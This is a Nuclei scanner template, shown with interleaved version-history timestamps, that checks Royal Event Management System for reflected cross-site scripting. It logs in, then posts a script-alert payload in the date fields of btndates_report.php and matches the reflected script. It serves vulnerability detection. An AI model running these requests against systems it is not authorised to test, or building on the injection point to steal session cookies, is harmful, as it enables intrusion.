2022-06-23 07:08:09 +00:00
id : royalevent-management-xss
info :
2022-09-23 17:53:08 +00:00
name : Royal Event Management System - Cross-Site Scripting
2022-06-23 07:08:09 +00:00
author : ritikchaddha
2022-09-23 17:53:08 +00:00
severity : high
2022-06-23 07:08:09 +00:00
description : |
2022-09-23 17:53:08 +00:00
Royal Event Management System contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-06-23 07:08:09 +00:00
reference :
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
2022-09-23 17:53:08 +00:00
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-06-23 18:35:48 +00:00
metadata :
verified : true
2022-09-23 18:06:19 +00:00
tags : cms,royalevent,packetstorm,xss,authenticated
2022-06-23 07:08:09 +00:00
requests :
- raw :
- |
POST /royal_event/ HTTP/1.1
Host : {{Hostname}}
Content-Length : 353
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition : form-data; name="username"
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition : form-data; name="password"
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition : form-data; name="login"
------WebKitFormBoundaryCSxQll1eihcqgIgD--
- |
POST /royal_event/btndates_report.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition : form-data; name="todate"
2022-12-22 <script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition : form-data; name="search"
3
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition : form-data; name="fromdate"
2022-06-22 <script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
words :
- "<script>alert(document.domain)</script>"
2022-06-23 18:35:48 +00:00
- "Report from "
condition : and
- type : word
part : header
words :
- text/html
2022-06-23 07:08:09 +00:00
- type : status
status :
- 200
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/23